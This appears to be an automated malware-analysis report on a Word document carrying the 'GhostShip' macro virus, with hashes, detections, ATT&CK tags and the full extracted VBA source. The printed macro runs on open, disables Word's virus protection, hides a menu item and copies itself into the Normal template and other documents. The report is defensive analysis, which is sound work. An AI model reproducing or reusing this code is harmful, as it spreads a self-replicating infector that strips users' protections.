GhostShip — Office (OLE) malware analysis

Static analysis result for SHA-256 cac7537613787550…

MALICIOUS

Office (OLE)

31.0 KB Created: 1998-08-24 20:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4c97e88e40ea44c2cd56994c4ee9fa0b SHA-1: 1c1cb3b0ccee7ae2aa4af50fb0c54e15143484fc SHA-256: cac7537613787550af5af819a57fbe19a54f53c06e397e693f3ebe96e58f8b9e
180 Risk Score

Malware Insights

GhostShip · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a malicious VBA macro. The macro is triggered by the Document_Open event, indicating it executes automatically when the document is opened. The script attempts to copy itself to Normal.bas and Document.bas, suggesting a persistence or infection mechanism. The family is identified as 'GhostShip' based on strings within the VBA code.

Heuristics 3

  • ClamAV: Doc.Trojan.Carrier-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Carrier-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2023 bytes
SHA-256: 2cfee8cff4ba7882cd910fa1232396ff420ba61a3e64eeef838ccdffaa8a30e3
Detection
ClamAV: Doc.Trojan.Carrier-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
VirName = GhostShip
Engine = DarkLord + LordArz
NormInstalled = False
ActInstalled = False
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Controls(3).Visible = False
'Infection way based on the old GhostShip Version
'New infection engine: TDIE by Dark Lord and Lord Arz
NormalTemplate.VBProject.VBComponents(1).export ("c:\Normal.bas")
ActiveDocument.VBProject.VBComponents(1).export ("c:\Document.bas")

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "VIRNAME = GHOSTSHIP" Then NormInstalled = True
If UCase(AI) = "VIRNAME = GHOSTSHIP" Then ActInstalled = True

If NormInstalled = True And ActIntalled = True Then GoTo PayLoad

If NormInstalled = True Then IW = "c:\Normal.bas" Else IW = "C:\Document.bas"
Open IW For Input As #1
VirCode = "Private Sub Document_Open()" & Chr(13)
Do
Line Input #1, SRCLine
Loop Until SRCLine = "Private Sub Document_Open()"
Do Until SRCLine = "End Sub"
Line Input #1, SRCLine
VirCode = VirCode & SRCLine & Chr(13)
Loop

If NormInstalled = False Then
Lines = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents(1).CodeModule.deletelines 1, Lines
NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, VirCode
End If
If ActInstalled = False Then
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.deletelines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, VirCode
End If

Close
Kill ("C:\Normal.bas")
Kill ("C:\Document.bas")
PayLoad:
WrittenBy = LordArz
End Sub